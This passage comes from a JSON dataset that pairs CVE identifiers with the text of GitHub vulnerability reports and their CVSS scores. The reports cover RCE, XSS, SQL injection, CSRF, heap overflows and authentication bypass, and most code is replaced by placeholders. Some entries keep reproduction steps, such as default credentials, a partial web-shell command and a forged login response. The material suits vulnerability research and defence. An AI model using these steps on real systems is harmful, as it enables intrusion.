  72665. "description": "Administrator Interface Command Execution Vulnerability. Vulnerability summary A command execution vulnerability exists in jfinal_cms NUMBERTAG JDK version requirements\uff1a JDK version used based on RMI NUMBERTAG u NUMBERTAG u NUMBERTAG u NUMBERTAG JDK version used based on LDAP NUMBERTAG u NUMBERTAG u NUMBERTAG u NUMBERTAG jfinal_cms version NUMBERTAG fastjson APITAG FILETAG vulnerability recurrence JDK version used in the test: JDK8u NUMBERTAG Run the tool on kali, start rmi and ldap services URLTAG APITAG FILETAG replace rmi or ldap address in payload: CODETAG Create the FILETAG file and copy the payload in FILETAG Log in to the Backstage management system, select template management default password:admin/admin NUMBERTAG FILETAG Click FILETAG FILETAG Click Replace file FILETAG Replace with the FILETAG file containing the payload just created FILETAG Visit /ueditor, execute the command to pop up the calculator APITAG FILETAG Vulnerability analysis APITAG The APITAG class is instantiated in the index method of the /ueditor route FILETAG APITAG The APITAG class is instantiated in the constructor of the APITAG class FILETAG APITAG The construction method of APITAG calls APITAG FILETAG APITAG Call APITAG to parse the file content, and the file content here is controllable, just replace the file content with the payload. FILETAG APITAG The file comes from APITAG . With any file upload vulnerability in the background, this file can be replaced with a file containing the payload to trigger fastjson deserialization FILETAG FILETAG",
  72666. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72667. "severity": "CRITICAL",
  72668. "baseScore": 9.8,
  72669. "impactScore": 5.9,
  72670. "exploitabilityScore": 3.9
  72671. },
  72672. {
  72673. "CVE_ID": "CVE-2021-42244",
  72674. "Issue_Url_old": "https://github.com/PaquitoSoft/Notimoo/issues/3",
  72675. "Issue_Url_new": "https://github.com/paquitosoft/notimoo/issues/3",
  72676. "Repo_new": "paquitosoft/notimoo",
  72677. "Issue_Created_At": "2021-08-12T20:12:15Z",
  72678. "description": "XSS via title, message. FILETAG NUMBERTAG has an XSS vulnerability which is executed when a title or message containing Javascript code are set in a notification. FILETAG POC Create a notification with a javascript payload: ERRORTAG Affected lines: URLTAG URLTAG",
  72679. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  72680. "severity": "MEDIUM",
  72681. "baseScore": 6.1,
  72682. "impactScore": 2.7,
  72683. "exploitabilityScore": 2.8
  72684. },
  72685. {
  72686. "CVE_ID": "CVE-2021-42248",
  72687. "Issue_Url_old": "https://github.com/tidwall/gjson/issues/237",
  72688. "Issue_Url_new": "https://github.com/tidwall/gjson/issues/237",
  72689. "Repo_new": "tidwall/gjson",
  72690. "Issue_Created_At": "2021-10-08T09:28:45Z",
  72691. "description": "APITAG can cause APITAG attacks. GJSON NUMBERTAG allows attackers to cause a redos via crafted JSON input.. func APITAG { APITAG := APITAG APITAG APITAG }",
  72692. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72693. "severity": "HIGH",
  72694. "baseScore": 7.5,
  72695. "impactScore": 3.6,
  72696. "exploitabilityScore": 3.9
  72697. },
  72698. {
  72699. "CVE_ID": "CVE-2021-42248",
  72700. "Issue_Url_old": "https://github.com/tidwall/gjson/issues/236",
  72701. "Issue_Url_new": "https://github.com/tidwall/gjson/issues/236",
  72702. "Repo_new": "tidwall/gjson",
  72703. "Issue_Created_At": "2021-10-01T04:53:27Z",
  72704. "description": "APITAG can cause APITAG attacks. GJSON NUMBERTAG allows attackers to cause a redos via crafted JSON input.. func APITAG { APITAG := APITAG APITAG APITAG }",
  72705. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72706. "severity": "HIGH",
  72707. "baseScore": 7.5,
  72708. "impactScore": 3.6,
  72709. "exploitabilityScore": 3.9
  72710. },
  72711. {
  72712. "CVE_ID": "CVE-2021-42341",
  72713. "Issue_Url_old": "https://github.com/OpenRC/openrc/issues/459",
  72714. "Issue_Url_new": "https://github.com/openrc/openrc/issues/459",
  72715. "Repo_new": "openrc/openrc",
  72716. "Issue_Created_At": "2021-10-08T01:34:40Z",
  72717. "description": "checkpath APITAG invalid pointer. I am a long time Gentoo user. I run Gentoo stable and unstable on a wide range of machines. On just one, a Gentoo unstable, running on a znver2 CPU, I get this error: APITAG This has persisted for months. I have done \"emerge e world\" many times, with various mtune, march, etc. and nothing affects the result. So I did a \"git pull, and looked at PATHTAG Then make this one change: CODETAG The problem goes away. Looks like APITAG is just a wrapper on APITAG According to \"man strlen\" ERRORTAG Looks to me like \"str\" is not big enough to hold \"path\" incuding its trailikng NUMBERTAG No idea how that makes \"free(path);\" fail. But I'm glad it does. .",
  72718. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72719. "severity": "HIGH",
  72720. "baseScore": 7.5,
  72721. "impactScore": 3.6,
  72722. "exploitabilityScore": 3.9
  72723. },
  72724. {
  72725. "CVE_ID": "CVE-2021-42341",
  72726. "Issue_Url_old": "https://github.com/OpenRC/openrc/issues/418",
  72727. "Issue_Url_new": "https://github.com/openrc/openrc/issues/418",
  72728. "Repo_new": "openrc/openrc",
  72729. "Issue_Created_At": "2021-04-07T17:25:51Z",
  72730. "description": "PATHTAG is broken in most recent release. CODETAG Not sure what's going on here, so I straced it: CODETAG ltrace: ERRORTAG",
  72731. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72732. "severity": "HIGH",
  72733. "baseScore": 7.5,
  72734. "impactScore": 3.6,
  72735. "exploitabilityScore": 3.9
  72736. },
  72737. {
  72738. "CVE_ID": "CVE-2021-42585",
  72739. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/351",
  72740. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/351",
  72741. "Repo_new": "libredwg/libredwg",
  72742. "Issue_Created_At": "2021-06-07T07:50:57Z",
  72743. "description": "Heap buffer overflow in copy_compressed_bytes in APITAG Affected version the latest commit URLTAG and NUMBERTAG What's the problem? A heap buffer overflow was discovered in copy_compressed_bytes in APITAG ASAN report: ERRORTAG Compile command APITAG How can we reproduce the issue? ERRORTAG POC file : FILETAG",
  72744. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72745. "severity": "HIGH",
  72746. "baseScore": 8.8,
  72747. "impactScore": 5.9,
  72748. "exploitabilityScore": 2.8
  72749. },
  72750. {
  72751. "CVE_ID": "CVE-2021-42586",
  72752. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/350",
  72753. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/350",
  72754. "Repo_new": "libredwg/libredwg",
  72755. "Issue_Created_At": "2021-06-07T07:46:30Z",
  72756. "description": "Heap buffer overflow in copy_bytes in APITAG Affected version the latest commit URLTAG and NUMBERTAG What's the problem? A heap buffer overflow was discovered in copy_bytes in APITAG ASAN report: ERRORTAG Compile command APITAG How can we reproduce the issue? ERRORTAG POC file : FILETAG",
  72757. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72758. "severity": "HIGH",
  72759. "baseScore": 8.8,
  72760. "impactScore": 5.9,
  72761. "exploitabilityScore": 2.8
  72762. },
  72763. {
  72764. "CVE_ID": "CVE-2021-42715",
  72765. "Issue_Url_old": "https://github.com/nothings/stb/issues/1224",
  72766. "Issue_Url_new": "https://github.com/nothings/stb/issues/1224",
  72767. "Repo_new": "nothings/stb",
  72768. "Issue_Created_At": "2021-10-07T20:06:19Z",
  72769. "description": "In stb_image's HDR reader, loading a specially constructed invalid HDR file can result in an infinite loop within the RLE decoder. Describe the bug In stb_image's HDR reader, loading a specially constructed invalid HDR file can result in an infinite loop within the RLE decoder. This issue includes a fix in pull request NUMBERTAG and a proof of concept file that can be used to reproduce the crash. We're reporting this on APITAG Issues following the guidance in issue NUMBERTAG The issue occurs in this loop URLTAG within APITAG : CODETAG The proof of concept file manages to get this part of the decoder into a state where: nleft is equal to NUMBERTAG s is at the end of the file. Because s is at the end of the file, APITAG always returns NUMBERTAG since APITAG here: CODETAG This means that count is always set to NUMBERTAG this passes the error check, but doesn't affect any program state, meaning that the loop runs forever, an availability issue. To Reproduce This .zip contains a NUMBERTAG KB .hdr file, APITAG which reproduces this issue: FILETAG Calling APITAG with a path to this file never returns. I was able to verify this using tests/image_test.c (modified slightly in order to build) on Windows version NUMBERTAG H2 with Microsoft Visual Studio NUMBERTAG and I expect it should reproduce on other systems as well. This file was found using the Radamsa fuzzer URLTAG . I think this particular file works by setting the RLE flags on the last scanline in the file and being truncated in just the right place, but I'm not NUMBERTAG sure. Expected behavior stbi_load should eventually return. Based on Bruce Walter's FILETAG , it seems like the intended behavior is that a run length of NUMBERTAG should be treated as invalid, which is the approach the pull request takes. However, other solutions are possible (e.g. detecting when the end of the file has been reached) I don't have any preference either way. Thanks!",
  72770. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  72771. "severity": "MEDIUM",
  72772. "baseScore": 5.5,
  72773. "impactScore": 3.6,
  72774. "exploitabilityScore": 1.8
  72775. },
  72776. {
  72777. "CVE_ID": "CVE-2021-42716",
  72778. "Issue_Url_old": "https://github.com/nothings/stb/issues/1166",
  72779. "Issue_Url_new": "https://github.com/nothings/stb/issues/1166",
  72780. "Repo_new": "nothings/stb",
  72781. "Issue_Created_At": "2021-07-14T10:52:47Z",
  72782. "description": "stbi__pnm_load heap buffer overflow bug . i find a heap buffer overflow(oob read) FILETAG in stbi__pnm_load, if req_comp && req_comp != s >img_n, the will call stbi__convert_format, But it does not multiply ri >bits_per_channel NUMBERTAG if ri.bits_per_channel NUMBERTAG will call stbi__convert NUMBERTAG to NUMBERTAG and make oob read APITAG ERRORTAG",
  72783. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  72784. "severity": "HIGH",
  72785. "baseScore": 7.1,
  72786. "impactScore": 5.2,
  72787. "exploitabilityScore": 1.8
  72788. },
  72789. {
  72790. "CVE_ID": "CVE-2021-42716",
  72791. "Issue_Url_old": "https://github.com/nothings/stb/issues/1225",
  72792. "Issue_Url_new": "https://github.com/nothings/stb/issues/1225",
  72793. "Repo_new": "nothings/stb",
  72794. "Issue_Created_At": "2021-10-07T20:08:31Z",
  72795. "description": "In stb_image's PNM reader, loading a specially constructed valid NUMBERTAG bit PGM file with NUMBERTAG channels can cause a crash due to an out of bounds read. Summary stb_image's PNM loader in version NUMBERTAG incorrectly interpreted NUMBERTAG bit PGM files as NUMBERTAG bit when converting to RGBA, leading to buffer overflow when later reinterpreting the result as a NUMBERTAG bit buffer. An attacker could potentially have crashed a service using stb_image, or read up to NUMBERTAG bytes of non consecutive heap data without control over the read location. CVE number: CVETAG URLTAG Describe the bug In stb_image's PNM reader, loading a valid NUMBERTAG bit PGM file that is large enough with the number of components set to NUMBERTAG can cause a crash in APITAG due to an out of bounds read. This issue includes a fix in pull request NUMBERTAG and a proof of concept file that can be used to reproduce the crash. We're reporting this on APITAG Issues following the guidance in issue NUMBERTAG This appears to be due to how when APITAG loads a NUMBERTAG bit PGM file with N bytes of data, it incorrectly calls APITAG instead of APITAG , returning a buffer that is NUMBERTAG N bytes long instead of NUMBERTAG N bytes. Since APITAG is still NUMBERTAG when control returns to APITAG , APITAG attempts to read APITAG bytes of data from this buffer, resulting in out of bounds reads. When N is large enough, this results in an access violation. To Reproduce This .zip contains a NUMBERTAG KB .pgm file, APITAG which reproduces this issue: FILETAG Calling APITAG with a path to this file and with a req_comp of NUMBERTAG produces a crash. I was able to verify this using tests/image_test.c (modified slightly in order to build) on Windows version NUMBERTAG H2 with Microsoft Visual Studio NUMBERTAG and I expect it should reproduce on other systems as well. This file was generated using the following Python script, and should be a valid PGM file: APITAG It was derived from an example found using the Radamsa fuzzer URLTAG . Interestingly, PATHTAG is also a NUMBERTAG bit PGM file, but reading it doesn't cause a crash! I believe the reason is because this is a NUMBERTAG image, so it only includes N NUMBERTAG bytes of image data, and as a result the out of bounds reads don't cross a page boundary that would result in an access violation. Expected behavior The example file should be loaded without crashing. Screenshots Here's a screenshot showing where the crash occurs and the call stack, when run with the example file in image_test.c. APITAG that the call in image_test.c may be off by NUMBERTAG lines; the specific callsite is APITAG .) FILETAG Thanks!",
  72796. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  72797. "severity": "HIGH",
  72798. "baseScore": 7.1,
  72799. "impactScore": 5.2,
  72800. "exploitabilityScore": 1.8
  72801. },
  72802. {
  72803. "CVE_ID": "CVE-2021-42870",
  72804. "Issue_Url_old": "https://github.com/xebd/accel-ppp/issues/158",
  72805. "Issue_Url_new": "https://github.com/xebd/accel-ppp/issues/158",
  72806. "Repo_new": "xebd/accel-ppp",
  72807. "Issue_Created_At": "2021-10-18T14:22:42Z",
  72808. "description": "Abnormal packet sequence can cause stack buffer underflow. Using version APITAG . Summary Sending PPTP Call Clear Request Packet after PPTP Start Control Connection Request and PPTP Outgoing Call Request to server can cause ERRORTAG . APITAG Here is the detailed information of sent packets: Packet NUMBERTAG CODETAG Packet NUMBERTAG CODETAG Packet NUMBERTAG CODETAG Hint: the APITAG field is randomly generated thus directly forwarding those three packets might not reproduce the scene. To reproduce it, it's neccessary to construct similar packets. Crash report log of server: ERRORTAG Here is the asan report: ERRORTAG Reproduce info Build APITAG : CODETAG Run APITAG , use the following command: APITAG The running configuration APITAG is: ERRORTAG",
  72809. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72810. "severity": "HIGH",
  72811. "baseScore": 7.5,
  72812. "impactScore": 3.6,
  72813. "exploitabilityScore": 3.9
  72814. },
  72815. {
  72816. "CVE_ID": "CVE-2021-42970",
  72817. "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/8",
  72818. "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/8",
  72819. "Repo_new": "cbkhwx/cxuucmsv3",
  72820. "Issue_Created_At": "2021-10-24T02:33:04Z",
  72821. "description": "A xss vulnerability was discovered in cxuucms NUMBERTAG There is a Persistent XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the imgurl of PATHTAG parameter :content POC APITAG APITAG Then view the webpage named test xss in admin feedback list page , XSS vulnerability is triggered successfully. APITAG",
  72822. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  72823. "severity": "MEDIUM",
  72824. "baseScore": 6.1,
  72825. "impactScore": 2.7,
  72826. "exploitabilityScore": 2.8
  72827. },
  72828. {
  72829. "CVE_ID": "CVE-2021-43116",
  72830. "Issue_Url_old": "https://github.com/alibaba/nacos/issues/7182",
  72831. "Issue_Url_new": "https://github.com/alibaba/nacos/issues/7182",
  72832. "Repo_new": "alibaba/nacos",
  72833. "Issue_Created_At": "2021-11-05T07:48:43Z",
  72834. "description": "Found a login background vulnerability. The steps to APITAG FILETAG APITAG the latest version of APITAG URLTAG APITAG the steps for installation APITAG the installation is successful, access the default login page FILETAG APITAG any account and password Click login and the login failed FILETAG APITAG at login time FILETAG Intercepting return packet FILETAG The intercepted return packet is FILETAG APITAG returns the package and lets it pass FILETAG The packet is: HTTP NUMBERTAG Server: APITAG Date: Sun NUMBERTAG Apr NUMBERTAG GMT Content Type: application/json;charset=UTF NUMBERTAG Connection: close Vary: Origin Vary: Access Control Request Method Vary: Access Control Request Headers Access Control Allow Origin: URLTAG Access Control Allow Credentials: true Authorization: Bearer APITAG Content Length NUMBERTAG APITAG NUMBERTAG At this point you can see that you have successfully entered the background FILETAG The reason for this problem is that NACOS uses the default JWT key",
  72835. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  72836. "severity": "HIGH",
  72837. "baseScore": 8.8,
  72838. "impactScore": 5.9,
  72839. "exploitabilityScore": 2.8
  72840. },
  72841. {
  72842. "CVE_ID": "CVE-2021-43116",
  72843. "Issue_Url_old": "https://github.com/alibaba/nacos/issues/7127",
  72844. "Issue_Url_new": "https://github.com/alibaba/nacos/issues/7127",
  72845. "Repo_new": "alibaba/nacos",
  72846. "Issue_Created_At": "2021-10-26T10:13:19Z",
  72847. "description": "A vulnerability was found that could cause any existing user to log in. APITAG Describe the bug A clear and concise description of what the bug is. A vulnerability was found that could cause any existing user to log in Expected behavior A clear and concise description of what you expected to happen. Acutally behavior A clear and concise description of what you actually to happen. How to Reproduce Steps to reproduce the behavior NUMBERTAG Download the latest version of APITAG NUMBERTAG Access prompt page FILETAG NUMBERTAG Enter any user name and APITAG login to capture packets Change the returned package to the following FILETAG FILETAG HTTP NUMBERTAG Server: APITAG Date: Sun NUMBERTAG Apr NUMBERTAG GMT Content Type: application/json;charset=UTF NUMBERTAG Connection: close Vary: Origin Vary: Access Control Request Method Vary: Access Control Request Headers Access Control Allow Origin: URLTAG Access Control Allow Credentials: true Authorization: Bearer APITAG Content Length NUMBERTAG APITAG NUMBERTAG We can see the successful login FILETAG Desktop (please complete the following information): OS: [e.g. Centos] Version APITAG Module [e.g. naming/config] SDK [e.g. original, spring cloud alibaba nacos, dubbo] Additional context Add any other context about the problem here.",
  72848. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  72849. "severity": "HIGH",
  72850. "baseScore": 8.8,
  72851. "impactScore": 5.9,
  72852. "exploitabilityScore": 2.8
  72853. },
  72854. {
  72855. "CVE_ID": "CVE-2021-43155",
  72856. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/18",
  72857. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/18",
  72858. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  72859. "Issue_Created_At": "2021-10-30T12:45:40Z",
  72860. "description": "SQL Injection vulnerability via the \"bookisbn\" parameter in FILETAG . Author APITAG ( APITAG Version NUMBERTAG Proof of concept CODETAG Response in Burpsuite FILETAG View source code FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG Remediation Please validate input of \" bookisbn \" parameter in APITAG",
  72861. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72862. "severity": "CRITICAL",
  72863. "baseScore": 9.8,
  72864. "impactScore": 5.9,
  72865. "exploitabilityScore": 3.9
  72866. },
  72867. {
  72868. "CVE_ID": "CVE-2021-43156",
  72869. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/19",
  72870. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/19",
  72871. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  72872. "Issue_Created_At": "2021-10-31T05:35:12Z",
  72873. "description": "CSRF vulnerability in FILETAG allows a remote attacker to delete any book. Author APITAG ( APITAG Version NUMBERTAG Details The GET request for deleting a book with APITAG looks like this: APITAG Changing the value of the bookisbn parameter under admin privilege will delete the book with that ISBN. A remote attacker can embed the request into an innocent looking hyperlink: APITAG Step to reproduce NUMBERTAG First, create a malicious HTML page then host a website containing that page. APITAG CODETAG NUMBERTAG Entice the admin to click on the link to the malicious site. When the admin browses to that site, the link would be automatically clicked via APITAG and the book will be deleted. Response in Burpsuite FILETAG FILETAG Source code review FILETAG FILETAG Remediation Implement an Anti CSRF Token.",
  72874. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  72875. "severity": "MEDIUM",
  72876. "baseScore": 6.5,
  72877. "impactScore": 3.6,
  72878. "exploitabilityScore": 2.8
  72879. },
  72880. {
  72881. "CVE_ID": "CVE-2021-43157",
  72882. "Issue_Url_old": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/1",
  72883. "Issue_Url_new": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/1",
  72884. "Repo_new": "projectworldsofficial/online-shopping-webvsite-in-php",
  72885. "Issue_Created_At": "2021-10-31T12:18:55Z",
  72886. "description": "SQL Injection vulnerability via the \"id\" parameter in FILETAG . Author APITAG ( APITAG Version NUMBERTAG Steps to reproduce NUMBERTAG A customer login to the store (to be able to access Cart page NUMBERTAG Add any product to cart NUMBERTAG Go to Cart page NUMBERTAG Click on \" Remove \" button to remove a product NUMBERTAG Intercept the request and insert the payload in the value of the id parameter. Example payload: APITAG Proof of concept CODETAG Response in Burpsuite FILETAG Source code review FILETAG FILETAG Remediation Validate input of id parameter in APITAG .",
  72887. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72888. "severity": "CRITICAL",
  72889. "baseScore": 9.8,
  72890. "impactScore": 5.9,
  72891. "exploitabilityScore": 3.9
  72892. },
  72893. {
  72894. "CVE_ID": "CVE-2021-43158",
  72895. "Issue_Url_old": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/2",
  72896. "Issue_Url_new": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/2",
  72897. "Repo_new": "projectworldsofficial/online-shopping-webvsite-in-php",
  72898. "Issue_Created_At": "2021-10-31T12:31:11Z",
  72899. "description": "CSRF vulnerability in FILETAG allows a remote attacker to remove any product in the customer's cart. Author APITAG ( APITAG Version NUMBERTAG Details The GET request for removing a prodcut with APITAG looks like this: APITAG Changing the value of the id parameter in the customer session will remove the product with that ID. A remote attacker can embed the request into an innocent looking hyperlink: APITAG Step to reproduce NUMBERTAG First, create a malicious HTML page then host a website containing that page. APITAG CODETAG NUMBERTAG Entice the customer to click on the link to the malicious site. When the customer browses to that site, the link would be automatically clicked via APITAG and the product will be removed. Response in Burpsuite FILETAG FILETAG Source code review FILETAG FILETAG Remediation Implement an Anti CSRF Token.",
  72900. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  72901. "severity": "MEDIUM",
  72902. "baseScore": 4.3,
  72903. "impactScore": 1.4,
  72904. "exploitabilityScore": 2.8
  72905. },
  72906. {
  72907. "CVE_ID": "CVE-2021-43177",
  72908. "Issue_Url_old": "https://github.com/tinfoil/devise-two-factor/issues/106",
  72909. "Issue_Url_new": "https://github.com/tinfoil/devise-two-factor/issues/106",
  72910. "Repo_new": "tinfoil/devise-two-factor",
  72911. "Issue_Created_At": "2017-03-07T21:58:24Z",
  72912. "description": "A consumed otp becomes valid again within the drift period. If an otp is consumed, it becomes invalid during the APITAG of the instantiated APITAG object in APITAG APITAG is currently always NUMBERTAG seconds, since that is the default: URLTAG However, during the drift period specified by APITAG , the otp again becomes valid. I believe this is unexpected behavior, and the intention is for an otp to not be reusable within the drift period after it has been consumed. Here are some specs dropped in here URLTAG which currently fail: CODETAG",
  72913. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
  72914. "severity": "MEDIUM",
  72915. "baseScore": 5.3,
  72916. "impactScore": 3.6,
  72917. "exploitabilityScore": 1.6
  72918. },
  72919. {
  72920. "CVE_ID": "CVE-2021-43298",
  72921. "Issue_Url_old": "https://github.com/embedthis/goahead/issues/304",
  72922. "Issue_Url_new": "https://github.com/embedthis/goahead/issues/304",
  72923. "Repo_new": "embedthis/goahead",
  72924. "Issue_Created_At": "2021-08-10T02:59:10Z",
  72925. "description": "Constant time password comparisons. Summary The password comparison routine employed in versions up to NUMBERTAG used a fail fast comparison which assist brute force password attacks. Detail The APITAG routine used the smatch routine which uses sncmp. This routine would fail as soon as a mismatch was detected. This fail fast behavior may provide information to remove brute force attacks and guide attackers into better password guesses by helping them focus their attacks. Threat Scope and Mitigation The attacker would need persistent access to a high speed network to perform the attack. If the password length is long, the threat level is lower, but a short password could be more vulnerable. Remedy Deploy APITAG NUMBERTAG Please contact Embedthis if you require further information, test code or assistance at EMAILTAG .",
  72926. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72927. "severity": "CRITICAL",
  72928. "baseScore": 9.8,
  72929. "impactScore": 5.9,
  72930. "exploitabilityScore": 3.9
  72931. },
  72932. {
  72933. "CVE_ID": "CVE-2021-43421",
  72934. "Issue_Url_old": "https://github.com/Studio-42/elFinder/issues/3429",
  72935. "Issue_Url_new": "https://github.com/studio-42/elfinder/issues/3429",
  72936. "Repo_new": "studio-42/elfinder",
  72937. "Issue_Created_At": "2021-11-01T11:06:24Z",
  72938. "description": "RCE APITAG NUMBERTAG Describe the bug bypass ext check Steps to reproduce the behavior NUMBERTAG create a .php file using the following URL: URLTAG APITAG file : URLTAG APITAG PHP code in FILETAG URLTAG echo APITAG p (please complete the following information): OS: Windows XAMPP",
  72939. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72940. "severity": "CRITICAL",
  72941. "baseScore": 9.8,
  72942. "impactScore": 5.9,
  72943. "exploitabilityScore": 3.9
  72944. },
  72945. {
  72946. "CVE_ID": "CVE-2021-43429",
  72947. "Issue_Url_old": "https://github.com/Seagate/cortx-s3server/issues/1037",
  72948. "Issue_Url_new": "https://github.com/seagate/cortx-s3server/issues/1037",
  72949. "Repo_new": "seagate/cortx-s3server",
  72950. "Issue_Created_At": "2021-07-18T08:19:31Z",
  72951. "description": "Potential error due to the unreleased lock . Dear developers: Thank you for your checking. In the method APITAG , the lock APITAG may be not released if the branch condition satisfies and the method returns. URLTAG URLTAG CODETAG Best,",
  72952. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72953. "severity": "HIGH",
  72954. "baseScore": 7.5,
  72955. "impactScore": 3.6,
  72956. "exploitabilityScore": 3.9
  72957. },
  72958. {
  72959. "CVE_ID": "CVE-2021-43453",
  72960. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4754",
  72961. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4754",
  72962. "Repo_new": "jerryscript-project/jerryscript",
  72963. "Issue_Created_At": "2021-08-28T22:00:46Z",
  72964. "description": "Heap overflow on an ill formed JS program. APITAG revision APITAG Build platform ERRORTAG Build steps APITAG Test case There are two test cases, where APITAG can trigger a direct crash of the clean built jerry and APITAG can trigger a heap overflow of the ASAN enabled built jerry. This bug is found by a naive fuzzer. And I use APITAG to reduce the test cases. I sincerely apologize for making them struggling. + FILETAG ERRORTAG + FILETAG ERRORTAG Execution steps APITAG ERRORTAG Output See above. Backtrace See above. Expected behavior Not to crash",
  72965. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72966. "severity": "CRITICAL",
  72967. "baseScore": 9.8,
  72968. "impactScore": 5.9,
  72969. "exploitabilityScore": 3.9
  72970. },
  72971. {
  72972. "CVE_ID": "CVE-2021-43464",
  72973. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/888",
  72974. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/888",
  72975. "Repo_new": "intelliants/subrion",
  72976. "Issue_Created_At": "2021-11-03T02:21:06Z",
  72977. "description": "There is a remote command execution vulnerability. Remote code execution vulnerabilities in the background Affected version subrion NUMBERTAG lates login address URLTAG Find Fields after login FILETAG On the right are the operations related to the column, choose one here, select Facebook FILETAG open Required field FILETAG Validation PHP code can enter any php code, here is a sentence of Trojan exec('echo ^ APITAG PATHTAG );exec('echo APITAG Off ^ APITAG PATHTAG ); Then go to APITAG to trigger it FILETAG At this time, you can access the shell and execute any command FILETAG principle The reason is that the code at the background Fields will be written to the database FILETAG Then when the information is modified, the data in it will be executed through APITAG FILETAG Proposed changes The incoming Validation PHP code adds filtering for sensitive functions, such as APITAG , APITAG , etc.",
  72978. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  72979. "severity": "HIGH",
  72980. "baseScore": 8.8,
  72981. "impactScore": 5.9,
  72982. "exploitabilityScore": 2.8
  72983. },
  72984. {
  72985. "CVE_ID": "CVE-2021-43478",
  72986. "Issue_Url_old": "https://github.com/kr0za/bugs/issues/1",
  72987. "Issue_Url_new": "https://github.com/kr0za/bugs/issues/1",
  72988. "Repo_new": "kr0za/bugs",
  72989. "Issue_Created_At": "2021-11-03T14:09:05Z",
  72990. "description": "install bug. In FILETAG , it is not checked whether FILETAG already exists in the website root directory. The install directory is not automatically deleted after the system installation. When you visit /install again, reinstall the website again. APITAG Installation succeeded APITAG The install directory is not automatically deleted after the system is installed,visit /install again APITAG The website was reinstalled APITAG",
  72991. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
  72992. "severity": "MEDIUM",
  72993. "baseScore": 5.4,
  72994. "impactScore": 2.5,
  72995. "exploitabilityScore": 2.8
  72996. },
  72997. {
  72998. "CVE_ID": "CVE-2021-43479",
  72999. "Issue_Url_old": "https://github.com/mikaelstaer/The-Secretary/issues/10",
  73000. "Issue_Url_new": "https://github.com/mikaelstaer/the-secretary/issues/10",
  73001. "Repo_new": "mikaelstaer/the-secretary",
  73002. "Issue_Created_At": "2021-11-04T08:53:43Z",
  73003. "description": "install rce. my env\uff1a Version NUMBERTAG php NUMBERTAG windows At APITAG input was saved to PATHTAG causing RCE APITAG APITAG Create a new database named APITAG and then visit FILETAG to install the website APITAG Then visit PATHTAG APITAG",
  73004. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73005. "severity": "CRITICAL",
  73006. "baseScore": 9.8,
  73007. "impactScore": 5.9,
  73008. "exploitabilityScore": 3.9
  73009. },
  73010. {
  73011. "CVE_ID": "CVE-2021-43492",
